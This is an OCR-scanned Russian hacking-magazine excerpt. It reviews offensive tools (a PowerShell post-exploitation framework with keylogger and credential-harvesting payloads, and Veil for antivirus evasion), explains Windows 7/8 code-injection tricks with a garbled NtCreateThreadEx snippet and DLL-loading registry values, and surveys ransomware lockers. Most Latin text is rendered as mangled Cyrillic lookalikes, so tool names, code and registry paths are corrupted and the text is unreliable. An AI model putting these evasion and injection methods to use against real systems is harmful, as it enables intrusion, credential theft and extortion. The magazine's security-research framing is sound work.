сопп/аеогаепісоіаои/ 

ісагиз 




РОШЕПЗНЕИ РОВ ОРРЕИЗІѴЕ 

ІЧізЬапд — это фреймворк, набор скриптов 
и рауіоасіз, которые позволяют использовать 
РоѵѵегЗЬеІІ в атакующих целях и проводить пост- 
эксплуатацию при тесте на проникновение. 
Среди уже реализованных нагрузок и скриптов 
(всего их на данный момент 28) можно выделить 
следующие: 

• Вго\л/зе_Ассер1:_АррІе1: — скрыто переходит 
по заданному ШІ_ в браузере и принимает 
одобрение запуска Цаѵа-апплета. По данно- 
му ШІ_ можно разместить подписанный Цаѵа- 
апплет с эксплойтом из Меіазріоіі:; 

• СЬеск-ѴМ — скрипт для детектирования вир- 
туальных окружений Нурег-Ѵ, ѴМ\л/аге, ѴіПиаІ 
РС, ѴігіиаІВох, Хеп и ОЕМІІ; 

• Сгесіепіііаіз — открывает пользователю окно 
для ввода аутентификационных данных и за- 
писывает их. Затем эти данные можно, на- 
пример, мгновенно отправить на ТіпуРазІе, 
СтаіІ или приватный РазІеЬіп; 

• ОМЗ_ТХТ_Р\/ѵпаде — скрипт, который ведет 
себя как бэкдор и способен получать команды 
и РоѵѵегЗЬеІІ -скрипты из РІЧЗ ТХТ запросов; 

• РоѵѵпІоасІ-Ехесиіе-РЗ — скачивает и выпол- 
няет РоѵѵегЗЬеІІ-скрипт; 

• \Л/аіІ_Рог_Соттапсі — запрашивает по опре- 
деленному ШІ_ инструкции для действий, 
а затем скачивает и выполняет РоѵѵегЗЬеІІ- 
скрипт; 

• Неплоѵе-ІІрсіаІе — скрыто удаляет опреде- 
ленные обновления с системы; 

• Кеуіоддег — кейлогер с возможностью пу- 
бликации данных в ТіпуРазіе, СтаіІ, РазІеЬіп; 

• СеІ-\Л/І_АЫ-Кеу5 — дампит ключи из \Л/І_АЫ- 
профилей. 



ПРЯЧЕМСЯ ОТ АНТИВИРУСОВ 

При проведении пентестов часто приходится 
бороться и с антивирусами, которые ни в какую 
не хотят пропускать наши тулзы и боевые нагруз- 
ки на охраняемые ими машины. Да, это можно 
делать с помощью различных кодеров, встро- 
енных в Меіазріоіі:, но скажем честно — спосо- 
бы, применяемые в нем, давненько не обновля- 
лись. Сейчас существуют уже более интересные 
и скрытые техники. Можно, конечно, делать 
и вручную, но это не наш подход. 

Чтобы каждый раз не проворачивать все 
по новой, хорошо бы автоматизировать данную 
задачу и при этом интегрироваться с любимым 
Меіазріоіі:. Как раз с такими мыслями и созда- 
вался проект ѴеіІ. 

ѴеіІ — это инструмент, предназначенный 
для генерации Меіазріоіі-нагрузок (рауіоасіз), 
которые способны обходить стандартные анти- 
вирусные решения. На текущий момент ин- 
струмент поддерживает семь различных ме- 
тодов для создания 21 нагрузки, в результате 
срабатывания которых происходит соединение 
с Меіегргеіег. 

Инструмент разработан на РуІЬоп, а для вы- 
полнения выходных РуІЬоп-файлов с обфусци- 
рованным шелл-кодом на платформе ѴѴіпсІоѵѵз 
без каких-либо сторонних зависимостей исполь- 
зуется ру2ехе/РуІпз1:аІІег. 

Файлы, полученные от ѴеіІ, тестирова- 
лись с антивирусами от МЗЕ, Казрегзку, АѴС, 
Зутапіес и МсАТее и продемонстрировали от- 
личный процент обхода. Автор просит не грузить 
сгенерированные рауіоасіз на ѴігизТоІаІ, чтобы 
не обучать антивирусные компании детектиро- 
вать детища ѴеіІ. 



ЕХРЮІТАТІОЫ ТООШТ ІСАГШ8 

Библиотека Ісагиз — это набор кросс- 
платформенных инструментов/функций и мо- 
дулей, призванных помочь в разработке ргооТ 
оТ сопсері эксплойтов. Текущий релиз включает 
в себя три проекта: Юізазт ЫЬгагу, Ехріоііаііоп 
Тооікіі: Ісагиз (ЕТІ) ЫЬгагу и Сопзоіе ІІзег ІпІегТасе. 

Юізазт ЫЬгагу — это библиотека для диз- 
ассемблирования. Прелесть данного дизас- 
семблера заключается в том, что он кросс- 
платформенный и поддерживает сразу несколько 
архитектур, при этом не имеет никаких сторонних 
зависимостей. Причем сделан он таким образом, 
что все данные об инструкции хранятся в инфор- 
мации о ней в виде массива свойств. Таким обра- 
зом, каждая инструкция описывается: 

• архитектурой процессора; 

• ЕІР (где она находится); 

• виртуальным адресом в памяти; 

• мнемоникой; 

• категорией (передача управления, математи- 
ческая операция и так далее); 

• опкодом; 

• модифицируемыми регистрами; 

• описанием каждого операнда. 

ЕТІ предоставляет набор модулей/инструмен- 
тов для содействия в разработке РоС. Библиотека 
в своем составе имеет как платформозависимые 
модули (отладчики, обработчики исполняемых 
файлов), так и платформонезависимые (фаззе- 
ры, алгоритмы анализа и обработки). На их базе 
уже есть ряд модулей от данного тулкита: поиско- 
вик инструкций, анализатор эксплуатабельности, 
поисковик гаджетов для ПОР Подробнее о тулки- 
те можно почитать здесь: Ьі1.Іѵ/11ІР70сІ . 
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80Ы ТООІ. ІНиАѴА 



Автор: гоп 190 

Система: ѴѴіпсІоѵѵз/ипих/Мас 

ЦРІ.: сосіе.аооаіе.сот/р/ізаі-іпіесііоп 



ІЗОІ_ Іпіесііоп — это бесплатное небольшое кросс-платформенное (ѴѴіпбоѵѵз, І_іпих, ОЗ X, 
Зоіагіз) приложение с открытым исходным кодом на баѵа, предназначенное для поиска ин- 
формации в базах данных с удаленных серверов. 

Некоторые особенности тулкита: 

• СЕТ, РОЗТ, Иеабег, соокіе методы; 

• погплаі, еггог ЬазесІ, Ыіпсі, Ііпле ЬазесІ алгоритмы; 

• автоматический выбор наилучшего алгоритма; 

• многопоточное управление (зіагі/раизе/гезите/зіор); 

• прогрессбар; 

• настройка и работа через ргоху; 

• удаленное чтение файлов; 

• терминал для ѵѵеЬзІіеІІ-команд; 

• проверка на админские страницы; 

• Ьгиіеіогсег (ІѴЮ5 Му80І_...); 

• кодировщик (епсобе-бесобе Вазе64, Нех, ІѴЮ5...); 

• поддержка МуЗОІ_. 





Автор: Іоѵѵ-ргіогііу 
Система: ѴѴіпсІоѵѵз 

ЦВІ.: ИНрз://Іоѵѵ- 

ргіогііѵ.аррзроі.сот/ 

оііѵсіцтрех/ 






Автор: Іоѵѵ-ргіогііу 
Система: ѴѴіпсІоѵѵз 

ЦРІ.: ННрз://1оуу- 

ргіогііѵ.аррзроі.сот/ 

оііѵтіагаіе/ 




ДАМПИМ ПАМЯТЬ 

При решении различных задач, связанных с ре- 
верс-инжинирингом, а если точнее — при рабо- 
те с вредоносным программным обеспечением, 
которое активно использует различные обфуска- 
торы и упаковщики, часто приходится произво- 
дить дамп памяти процесса для последующего 
его анализа. Так как процесс активен, то боль- 
шинство его упаковщиков и обфускаторов уже 
отработали и можно видеть почти истинное лицо 
негодяя. Так что дампер памяти процесса в таких 
задачах вещь незаменимая. Также каждый иссле- 
дователь отдает предпочтение тому или иному от- 
ладчику, например по личному набору плагинов, 
но порой необходимо их варьировать, а интер- 
фейс и возможности плагинов хотелось бы иметь 
одинаковые вне зависимости от отладчика. 

ОІІуйитрЕх РІидіп решает эту проблему — 
он позволяет очень гибко дампить память и под- 
держивает несколько самых популярных отладчи- 
ков: ОІІуйЬд, Ітплипііу Ребиддег 1 .7/1 .8, ЮА Рго. 
Особенности инструмента: 

• выбор для дампа ехе-файла, ОІ_І_ или модуля; 

• поиск М2/РЕ-сигнатур в памяти; 

• несколько режимов дампа, пересборка обыч- 
ного РЕ-дампа, парсинг РЕ-дампа; 

• поддержка РЕ32+; 

• поддержка нативных 64-битных процессов; 

• дамп любого адресного пространства как сек- 
ции (даже если ее нет в заголовки секций); 

• добавление пустых секций; 

• правка РѴА в ОаіаОігесІюгу для последующего 
изменения ІтадеВазе; 

• автовычисление большого количества па- 
раметров (ВаѵѵЗіге, ВаѵѵСЖзеІ, ѴігШаІОТТзеІ: 
и другие). 



НООКАЫАІ.Ѵ8ЕП 

Ноок Апаіузег — это инструмент для захвата 
функций, который может быть очень полезным 
при реверс-инжиниринге программы и анализе 
вредоносного программного обеспечения. Ноок 
Апаіузег имеет пять ключевых функций: 

• запуск и захват приложения; 

• захват определенного процесса; 

• статический анализ плаіѵѵаге; 

• анализ падения приложения; 

• извлечение исполняемого модуля из процесса. 

Для захвата функций программа поддержи- 
вает три режима: автоматический, когда парсит- 
ся таблица импорта приложения и хуки ставятся 
на указанные АРІ, ручной, когда перед постанов- 
кой хука на функцию запрашивается желание 
пользователя, и умный режим, когда хуки ставят- 
ся только на особо интересные функции. Посмо- 
трим на самые важные модули программы. 

Модуль статического анализа плаіѵѵаге позво- 
ляет сканировать исполняемые файлы для иден- 
тификации потенциально вредоносных путей. 

• валидация РЕ-файла; 

• обнаружение ИЗ-записей, подозрительных 
точек входа, упаковщиков; 

• сигнатуры путей; 

• онлайн-поиск по ІѴЮ5 в ТІлгеаІ: Ехрегі; 

• зѣгіпд битр (А5СІІ); 

• Ілехбитр, РЕТіІе инфо дампер и другие. 

Модуль анализа падений позволяет писате- 
лям эксплойтов и/или разработчикам ПО анали- 
зировать содержимое памяти, когда приложение 
упало. Программа отображает содержимое реги- 
стров, содержимое стека, цепочку ЗЕН. 



ОТ ОТЛ А ДЧ И КА К ОТЛ АДЧ И КУ 

Каждый отладчик имеет как сильные, так и сла- 
бые стороны, и у каждого они свои — идеаль- 
ного инструмента нет. В одном удобно обходить 
антиотладочные приемы, в другом — использо- 
вать огромный арсенал уже готовых плагинов, 
а в третьем — писать собственные скрипты. 
С недавних пор стало возможно работать после- 
довательно сразу в ОІІуйбд, Іплплипі1:у Ребиддег 
и ЮА Рго. Как? 

Встречайте ОІІуМідгаІе РІидіп — инструмент, 
который позволяет передавать процесс отладки 
другому отладчику без перезапуска. Так что мы 
можем в своей работе использовать только 
сильные стороны каждого отладчика благодаря 
миграции от одного к другому. 

Например, сначала мы можем обратиться 
к ОІІуЮЬд для обхода антиотладочных приемов 
и нахождения ОЕР (ОгідіпаІ Епіту Роіпі:), а затем 
передать управление Іттипііу Ребиддег и с по- 
мощью его возможности использовать РуШоп- 
скрипты править обфусцированную таблицу 
импорта. 

Поддерживаются следующие отладчики: 

• ОІІуРбд 1/2; 

• Ітплипііу Ребиддег 1 .7/1 .8; 

• ЮАРго; 

• ѴѴіпРбдб.х. 

В ОІІуМідгаІе РІидіп уже реализованы: 

• многопоточность и возможность приостанав- 
ливать потоки; 

• перенос настроек софтверных точек останова 
(сохраняя статус включен/выключен); 

• перенос текущей исследуемой позиции в па- 
мяти. 
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ИНЖЕКТИМ ^ 
КОД В ѴѴШ8 



Александр Эккерт 

5І:аппіс.тап@дтаіІ.сот 



Живы ли старые 
способы? И куда 
мы будем копать 
в будущем? 

С появлением \Л/іп7 (а точ- 
нее — с появлением ѴѴіпсІоѵѵз 
Ѵізіа) механизмы обеспече- 
ния безопасности системы 
сделали качественно новый 
скачок. Если в Ѵізіа они были 
очень сырыми, необкатанны- 
ми, то с выходом в светѴѴіп7 
очень многое изменилось. 

В этой статье мы пройдемся 
по истории противодействий 
инжекту кода в разных верси- 
ях винды и посмотрим, ка- 
кие резервы для злохакеров 
остались в последней версии 
форточек. 




В первую очередь стоит остановиться на успев- 
ших хорошо себя зарекомендовать техноло- 
гиях защиты системы, таких как РаІсІіСиагсІ 
и КегпеІ-тосІе собе зідпіпд. Первая препят- 
ствует модификации критических с точки зре- 
ния безопасности системных модулей (ядро, 
ряд ключевых драйверов и прочее), а вторая 
не дает возможности загружать сторонние мо- 
дули, не имеющие общепризнанного сертифи- 
ката (о таких вещах, как ѴѴіпсІоѵѵз ЗплаПЗсгееп, 
ІІЕРІ, ЕІ_АМ + Зесиге Вооі:, а также некоторых 
других я не говорю, поскольку это мало каса- 
ется темы статьи). 

Наличие этих двух технологий серьезно ос- 
ложнило жизнь тем руткитам, которые начиная 
сѴѴіпХР стремились подчинить системы, внедря- 
ясь в ядро (например, те же самые Т0І./Т088 или 
Ризіоск). С внедрением данных технологий в жиз- 
ни руткитостроителей, действительно, вольготно- 
сти поубавилось. 



Еще одним оплотом безопасности стала про- 
двинутая по сравнению с ѴѴіпХР система прав 
и разграничений, основанная на сепарации 
пользовательских сессий — разделении систем- 
ных процессов и сервисов, стартующих первы- 
ми и получающих пресловутую 0-сессию, и всех 
остальных программ. 

Третьим значительным нововведением в без- 
опасности ѴѴіпсІоѵѵз стало внедрение ѴѴіпсІоѵѵз 
Реіюпсіег (защитник ѴѴіпсІоѵѵз), ранее известной 
как МісгозоТІ: АпйЗруѵѵаге. 

Все это, конечно же, радует. Однако вопросов 
о безопасности системы возникает еще больше. 

ѴѴШООѴѴ88-САМАЯ БЕЗОПАСНАЯ 
СИСТЕМА НАСЕГОДНЯШНИЙ ДЕНЬ? 

Действительно, можем ли мы это утверждать? 
Нет, и вот почему. 

Ключевой момент любого зловреда или мал- 
вари — это гарантия безопасного выполнения 



их кода. Неважно, в виде отдельного процесса 
или инжекта своей ОІ_І_ (или как вариант — шелл- 
кода). 

Все остальное — от лукавого. Ибо если нет 
выполненного кода, нет и профита. Обфускация, 
упаковка и крипт всего лишь условие для его вы- 
полнения, чтобы скрыть вредоносный код от зор- 
ких глаз аверов. 

Надо сказать, что этот самый ключевой мо- 
мент — старт нового процесса/потока — был 
взят под жесткий контроль с выходом ѴѴіпсІоѵѵз 
Ѵізіа на уровне самой операционной системы. 
Думаю, ты знаешь, что с ее появлением была ре- 
ализована концепция «защищенных» процессов 
(ргоіесіесі ргосезз) — это новый тип процессов, 
появившихся в висте для расширенной поддерж- 
ки ОВМ (ОідііаІ Відіііз Мападеплепі:). Суть техно- 
логии в том, что обычный процесс по отношению 
к защищенному процессу не может создавать 
потоки, иметь доступ к виртуальной памяти, де- 
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кументированных можно упомянуть АРРІпіі-сІІІз 
( оо.аІ/ЗГГМХ ). когда прописанные в реестре 
ОІ_І_’ки автоматом подгружаются в стартующие 
процессы. 

Но самый большой практический интерес 
представляют недокументированные возможно- 
сти системы, использование которых позволяет 
прозрачно подгружать в стартующие процессы 
библиотеки. Например, такой трюк был в первых 
версиях ТОІ_, когда для запуска руткита использо- 
валась прозрачная загрузка расположенной в си- 
стемной папке ОІ_І_, реализующей функции Ргіпіег 
Ргоѵібог. 

На самом деле есть еще немало неизвест- 
ных и недокументированных возможностей под- 
гружать 01_І_ в процесс. Например, технологии 
Арріісаііоп ѴегіТіег, ЗІііпл и НоІраІсН. Технология 
Арріісаііоп ѴегіТіег ( 1іпѵигІ.сот/оТп\л/7хЬ ) загру- 
жает ОІ_І_ до загрузки кегпеІ32.сІІІ (кегпеІЬазе. 
сІІІ), если необходимым образом прописать эту 
загрузку в реестре (НКЕѴ_ШСАІ_МАСНІЫЕ\50РТ- 
ЫАКЕ\Місго5оТТ\Міпсіоѵ\/5 І\ІТ\Сиггеп1іѴег5Іоп\ 
Іта§е Рііе ЕхесиТіоп 0рТіоп5\по1:ерасІ . ехе) 
со значениями полей: 



АРІ Мопііог — куда без него в таком пекле 

лать отладку процесса, создавать дупликат хэнд- 
ла. Об этом достаточно подробно писал Алекс 
Ионеску (АІех Іопезси) у себя в блоге ( ѵѵѵѵѵѵ.аіе 

іопезси.сот/?р=34 ). 

Все это, конечно, хорошо, однако надо пом- 
нить, что ѴѴіпсІоѵѵз 8 все же очень сложная си- 
стема. А чем сложнее механизм, тем сложнее 
его контролировать. Жесточайшая конкуренция 
среди производителей операционных систем 
вынуждает бороться за покупателя, придумы- 
вать и внедрять все новые и новые технологии 
взаимодействия с пользователем, что в усло- 
виях дефицита времени приводит к ощутимым 
провалам в безопасности. Как следствие — 
ошибок в дизайне системы надо ожидать 
предостаточно. И ошибок очень неприятных, 
приводящих к возможности исполнения кода 
с поднятыми правами. В подтверждение заме- 
чу, что до сих пор на багтраке уйма найденных 
уязвимостей. А теперь самое неприятное. Даже 
если отшлифовать и довести до ума основные 
компоненты системы, то всегда найдется масса 
пользовательских приложений, которые пишут- 
ся тяп-ляп и при этом обладают повышенными 
правами и пользуются доверием ОС. Что успеш- 
но эксплуатируется (вспомним АбоЬе) и будет 
использовано малварщиками при написании 
своих зверушек. 

Сразу скажу — не надо ждать у моря пого- 
ды и полагаться на подарки судьбы в виде про- 
валов, найденных в обеспечении безопасности 
системы. Возьми в руки инструменты, такие 
как ЮА Рго, ѴѴіпОВС и прочие, научись ими поль- 
зоваться, стань исследователем безопасности 
систем — сегодня все решает ресерчинг, поиск 
и анализ недокументированных возможностей 
ѴѴіпсІоѵѵз. 

Так, в Сети ( І00ги.ѵехі11іит.ога/?р=1421 ) мож- 
но найти некий «анализ» МЗйІЧ с описаниями 
АРІ -функций, структур и перечислений, кото- 
рые содержат в себе крайне любопытные метки 
РезегѵесІ Рог Зузіепл ІІзе — «Зарезервировано 
для системного использования», что, по настоя- 
нию МЗйІЧ, нельзя использовать в своих разра- 
ботках. Именно там прячутся самые интересные 
загадки поведения операционной системы: если 
МісгозоТІ: пытается скрыть их истинное предна- 
значение, велика вероятность, что их использо- 
вание может серьезно скомпрометировать всю 



систему. То есть вполне возможно, что, воору- 
жившись отладчиком и закопавшись в дебаггинг 
таких функций по самые уши, ты сумеешь оты- 
скать и некие скрытые механизмы межпроцес- 
сного взаимодействия, которые неизвестны в па- 
блике до сих пор. 

САДИМСЯ ЗА КОДИНГ 

Итак, что остается в арсенале малварщика на се- 
годняшний день? 

На самом деле ничего принципиально нового 
в способах инжекта кода в ѴѴіпсІоѵѵз 7/8 нет — все 
те же самые І_оасІІ_іЬгагу, СгеаіеКеітіоІіеТІігеасІ, 
ІлІпіІіеРгосеззМетогу, КіІСгеаІіеІІБегТІігеасІ. Ме- 
тоды остались все те же, изменились условия их 
использования — как я уже писал, появились пал- 
ки в колесах: «защищенные процессы», контроль 
за сессиями и тому подобное. 

Самый верный способ — вызов замечатель- 
ной функции ІМІіСгеаІіеТІ'ігеасІЕх (справедливости 
ради надо отметить, что КіІСгеаіеІІБегТІігеасІ 
всего лишь обертка под ІМІіСгеаІіеТІ'ігеасІЕх). 

АРІ-функция ІМіСгеаІеТІігеасІ оставлена в Ѵіз1:а+ 
лишь для совместимости с предыдущими систе- 
мами. Вызов самой функции не представляет 
труда: 

= ІМ1іСгеа1:еТІігеасІЕх<-< 

(& пеіл/ТІігеасІНапсІІе, 6ЕІМЕКІС АН, 0 , <-> 
ргосНапсІІе . ( ІРТНКЕАР5ТАКТК01ЯІІМЕ ^ 
зІгагЕАсІсІгезз. рапат. сгРІа^з. 0.0.0. <-■ 

& аіігИБі) 

где айгЫз* — указатель на структуру РРЮС_ 
ТНРЕАО АТТРІВІІТЕ иЗТ, включающую в себя 
другую структуру РВОС_ТНВЕАО_АТТВІВІІТЕ_ 
ЕІЧТВХ их описание легко найти в интернете. 

Код, реализующий инжект с применением 
ІМІіСгеаІіеТІ'ігеасІЕх, ты сможешь отыскать в Сети, 
он без труда гуглится. 

ХИТРОСТИ И ТОНКОСТИ 

Дело в том, что иногда напрямую вызывать функ- 
ции запуска процесса/потока для старта своего 
кода необязательно, если вспомнить о системных 
документированных и, самое главное (!), недоку- 
ментированных возможностях, связанных с под- 
грузкой системных ОІ_І_ в адресное пространство 
какого-то процесса. Например, из известных до- 



(з1оЬа1Г1а^=ѲхѲ2ѲѲѲ1ѲѲ 
ѴегіЯегРеЬи§=Ѳх-р-р-р-р-р-р-р-Р 
Ѵегі^іепР1І5=та самая . сІІІ (которая 
должна находиться в папке зуз1:ет32^ 

Вспоминается классная техника, реализо- 
ванная в рутките ТОІ_4, — элегантный обход ІІАС 
и инжект своей ОІ_І_, основанные на «автоподня- 
тии» прав процесса, которые запускает ехріогег. 
ехе и, соответственно, получающих привилегии 
заинжектить свой код в ехріогег.ехе. 

Суть инжекта — подмена сгурШазе.сІІІ на свою, 
которая будет автоматом подгружена ехріогег.ехе. 
Правда, это будет работать, только если у пользо- 
вателя есть админские права. 

Справедливости ради скажу, что свои недо- 
статки, конечно же, есть и у этих способов, однако 
само их наличие говорит о том, что рано списы- 
вать со счета системные механизмы межпроцес- 
сного взаимодействия. 

СЕССИ И , П РАВА И КОНТРОЛ Ь ДОСТУПА 

Поговорим теперь о неотъемлемой части меж- 
процессного взаимодействия в ѴѴіпсІоѵѵз — сес- 
сиях и контроле доступа. Я уже писал в нашем 
журнале об этих компонентах системы. Отмечу 
лишь, что начиная с ѴѴіпсІоѵѵз Ѵізіа в операци- 
онке реализован механизм Зеззіоп Зерагайоп, 
который не позволяет инжектить код в основ- 
ные системные процессы и сервисы, старто- 
вавшие в 0-сессии. И да, действительно, функ- 
ция СгеаіеКетоІіеТІ'ігеасК ) тут обломается. 
Но не функция ІМ1іСгеа1іеТІ'ігеасІЕх( ), которой это 
оказывается под силу. 

Ну и конечно же, нельзя забывать про необхо- 
димость добавлять привилегии себе любимому, 
когда речь идет об инжекте кода. 

РПО&СОИ8 

Слов нет, заинжектить свой код в процесс под 
ѴѴіпсІоѵѵз 8 можно. 

Не претендуя на новизну, замечу, что до сих 
пор возможностей для исполнения своего кода 
в системе остается уйма. И к сожалению, от са- 
мой ѴѴіпсІоѵѵз здесь мало что зависит — всегда 
есть возможность зайти с тыла, использовать уяз- 
вимости сторонних программных приложений, 
которые смогут выполнить твой код в системе, 
как тебе нужно. Все дело в ресерче, упорстве, ибо 
везет тем, кто везет. Как-то так. 

И да пребудет с тобой Сила! НС 



Маіѵѵаге 
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МАЛ ВАРЬ, 

БАБЛО 



КАЧАЙ 





БОЛЬШОЙ ОБЗОР 
СОВРЕМЕННОЙ 
МАЛ ВАРИ, ОТЖИ- 
МАЮЩЕЙ ДЕНЬГИ 
У ПОЛЬЗОВАТЕЛЕЙ 



В нынешних компьютерах и смартфонах хранятся живые 
деньги. Ну, пусть не хранятся, но уж доступ-то к ним вполне 
себе обеспечивается! Поэтому сейчас мы видим, что старые 
добрые методы, такие как шантаж, вымогательство и мошен- 
ничество, показывают себя на новом технологическом уров- 
не. А у нас тем временем и обзорчик готов! 
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Локер- гастарбайтер 



К ак известно, времена идейных вирусописателей канули в Лету, 
в отдельно взятых странах наступил капитализм, и пишут вредо- 
носный код теперь почти исключительно на коммерческой осно- 
ве. Конечно, идейные люди остались, но они скорее поставщики 
интересных фишек и способов обхода механизмов безопасности 
операционной системы ѴѴіпсІоѵѵз, а другие, более ушлые люди реализуют эти 
наработки в своих вредоносных творениях. Вредоносность может быть, так 
сказать, прямая и косвенная. Одни трояны ориентируются на монетизацию 
аппаратных ресурсов и вычислительных мощностей конечных пользователей. 
Сюда относятся: организация прокси- и ЭЭоЗ-атак, рассылка спама, Ьіісоіп- 
майнинг, накрутка посещений сайтов (Ыаск ЗЕО), переход по рекламным 
баннерам (сііск ^гаиб). Яркий представитель группы — ІегоАссезз. Эти вре- 
доносные программы не причиняют непосредственный ущерб пользовате- 
лю. Единственные неприятности от таких вредоносов — замедление работы 
компьютера и сбои в ней. А в современных условиях, когда вычислительные 
мощности стали достаточно большими, пользователь вообще может не подо- 
зревать, что его компьютер стал частью ботнета. 

Другие представители плаіѵѵаге наносят пользователю ощутимый вред, 
в том числе финансовый. К этой категории относятся: программы-вымо- 
гатели, куда входят две разновидности — локеры и шифровальщики, хотя 
в последнее время границы между ними размываются; фейковые антиви- 
русы, требующие денежку за установку (это проходит по категории «мошен- 
ничество»); вредоносные программы, предназначенные для кражи учетных 
данных пользователей, в том числе от систем дистанционного банковского 
обслуживания (ДБО), «классические» представители — 2еиз и его последо- 
ватели — ЗруЕуе и СИасІеІ. 

Как ты можешь заметить, интерес правоохранительных органов к этим 
группам малвари будет отличаться. К первой группе интерес маленький, 
ко второй — большой, так как в первом случае пользователь максимум пере- 
ставит себе ось, а во втором — побежит с заявой в полицию. Есть мнение, 
что таким образом некоторые трояномейкеры пытаются поменьше привле- 
кать внимание к себе и своим поделкам. Далее как раз и будут рассмотрены 
некоторые представители второй группы. 

Есть еще третья группа — шпионские программы, как широкой (зруѵѵаге), 
так и специальной (АРТ) направленности. Эта тема сейчас активно форсится 
всеми антивирусными вендорами, но обычных пользователей это, как пра- 
вило, не касается. В данном случае монетизация достигается тем, что такие 
трояны добывают конфиденциальную информацию, за которую заказчики го- 
товы заплатить кругленькую сумму. 



Настораживает, что многие европейские фирмы (Сатпла 
Сгоир, Наскіпд Теат) в открытую предлагают услуги по мас- 
совой установке так называемых «государственных» троянов, 
которые на бумаге предназначены для сотрудников правоохра- 
нительных органов и спецслужб, а по факту могут применять- 
ся любым, кто располагает соответствующими финансовыми 
средствами. По информации компании МсАТее, разработчики 
трояна СііасІеІ, уже ставшего «классикой», в настоящее время 
«ушли в тень» и стали внедрять шпионские модули — и, судя 
по всему, тоже начали предлагать свои услуги государственным 
и коммерческим организациям, занимающимся добыванием 
информации в интернете. 

ВИНЛОКЕРЫ ТАКИЕ ВИНЛОКЕРЫ 

Впервые они появились в конце 2007 года. Широкое распро- 
странение получили зимой 2009-2010 годов, по некоторым 
данным оказались заражены миллионы компьютеров, пре- 
имущественно среди пользователей Рунета. В простейшем 
случае после загрузки ОС или даже до нее (встречались и такие 
экземпляры) показывалось красивое окошечко с требованием 
отправить каким-либо способом энную сумму злоумышлен- 
никам в обмен на код разблокировки. Общий совет от сотруд- 
ников антивирусных компаний — ничего не платите! Время 
«честных» винлокеров, содержащих в себе функционал авто- 
удаления по коду, давно прошло, и сейчас эту нишу киберпре- 
ступности облюбовали детишки с непомерными амбициями. 
Многочисленные форумы запестрели постами с генераторами 
и исходными кодами локеров. Вот, например, одна поделка 
(см. рис. выше), на которую невозможно смотреть без сме- 
ха, — ѴѴіпІоск Ьу ЭгадопСапд. Размер шедевра потрясает вооб- 
ражение — целых семь метров! Написан в среде Эеірііі 7. Код 
разблокировки 141989081989 хранится в исполняемом файле 
в открытом виде. Есть мнение, что текст намеренно написан 
в стиле незабвенного Джамшута и автор за счет этого пропиа- 
рился на весь интернет (в том числе и в этой статье). 

А пока школьники окучивают славянскую аудиторию, «ком- 
мерсанты» от мира троянов наводняют винлокерами зарубе- 
жье. Даже появился специальный термин — мультилокер. Это 
такой локер, который изначально не содержит в себе никаких 
ресурсов — надписей, картинок и прочего, а загружает их 
с командного центра злоумышленников, при этом скачивае- 
мое содержимое зависит от страны, которая определяется 
по ІР-адресу. Основная тематика мультилокеров — обвине- 
ние пользователя в просмотре порнографических материалов 
с участием несовершеннолетних, сами знаете — с этим за ру- 
бежом строго. При этом в качестве доказательства жертве 
демонстрируются якобы просмотренные ею снимки, а также 
имена, даты рождения и место проживания несовершенно- 
летних, изображенных на фото. Последние разработки учли 
массовое распространение ноутбуков, которые почти всегда 
имеют встроенную веб-камеру: пользователя снимают и затем 
демонстрируют фото, что еще больше усиливает эффект при- 
сутствия Большого Брата, то есть слежки со стороны ФБР или 
еще какой правоохранительной организации. Или вот фишка — 
сканирование истории посещенных сайтов в браузере. Не се- 
крет, что большинство мужского населения мира периодически, 
кхм, любуются на голых женщин из интернетов. Поэтому, когда 
у пользователя на экране появляется заставка о штрафе с сим- 
воликой Интерпола и перечнем посещенных «злачных» мест ин- 
тернета, у него не возникает даже тени сомнения в том, что это 
взаправду. 

Таким образом, рынок винлокеров сегментировался: с од- 
ной стороны выступают скрипткидисы с кулхацкерами, с дру- 
гой — «ветераны» троянописательства, пишущие мультилокеры 
на манер ботсетей с собственными центрами управления. 

Один из наиболее сложных и высокопрофессионально на- 
писанных буткитов Сарг также имеет в своем арсенале вре- 
доносных модулей локер. Компонент с таким функционалом 
проверяет по ІР-адресу местонахождение зараженного ком- 
пьютера, и если жертва живет в Западной Европе или Америке, 
то система блокируется и выводится окно с требованием пере- 
вести определенную сумму на указанный счет. Отличает этот 
локер то, что он перехватывает изображение с подключенной 
к зараженному компьютеру веб-камеры и показывает его в окне 
с требованием оплаты (не зря у меня камера изолентой заклее- 
на. Я серьезно. — Прим. ред.). 



Времена идейных вирусописателей канули 
в Лету, в отдельно взятых странах насту- 
пил капитализм, и малварщики пишут вре- 
доносный код теперь почти исключительно 
на коммерческой основе 
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Проверка безопасности 
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Далее 
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о сайте правила реклана раіработвдан 
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Вид одной из фейковых страниц Мауасііок 



Особняком стоят локеры, которые блокируют доступ не к операцион- 
ной системе, а к каким-либо популярным ресурсам из браузера. В апре- 
ле зафиксирован шквал запросов от пользователей о невозможности 
входа на сайты «ВКонтакте», «Одноклассники» и МаіІ.ги. Вместо соответ- 
ствующих интернет-ресурсов в окне браузера демонстрировались веб- 
страницы с сообщением о том, что профиль пользователя заблокирован 
в связи с подозрением на взлом аккаунта, и предложением ввести свой но- 
мер телефона. После ввода номера в ЗМЗ приходит код, который пользо- 
ватель опять-таки посредством ЗМЗ должен подтвердить. По факту за от- 
правку этого ЗМЗ снимается энная сумма денег. В ходе разбирательств 
было установлено, что все это — проделки малвари, заменяющей систем- 
ный файл грсзз.сІІІ на свой вредоносный код. Е5ЕТ определяет эту угро- 
зу как ѴѴіп32/Ра1:сІіеб.ІВ. Запущенный зловред подменяет 0148-запросы, 
возвращая ІР подконтрольных злоумышленникам серверов, содержащих 
веб-страницы, имитирующие целевой ресурс — ѵк.сопл, осіпокіаззпікі.ги, 
таіі.ги. При этом в адресной строке браузера отображается правильный 
ІІВІ_. Корректного метода лечения для всех многочисленных модификаций 
Ѵ\/іп32/Ра1:сИесІ. ІВ у большинства антивирусных продуктов на момент напи- 
сания статьи нет. Для лечения вручную необходимо взять чистую грсзз.сІІІ, 
загрузиться с ЫѵеСО и заменить ей вредоносную библиотеку. Оригиналь- 
ная грсзз.сІІІ должна соответствовать версии, разрядности и установлен- 
ным сервис-пакам установленной ѴѴіпсІоѵѵз (РаІсІіесІ.ІВ успешно работает 
как в ХР, так и в Зеѵеп, в том числе х64). 

Среди других угроз подобного типа можно отметить появление очередной 
модификации трояна семейства Мауасііок. По информации антивирусных 
аналитиков Ог.ѴѴеЬ, Тгоіап. Мауасііок. 18607 представляет собой совершенно 
самостоятельный вариант, написанный «по мотивам». В качестве примера 
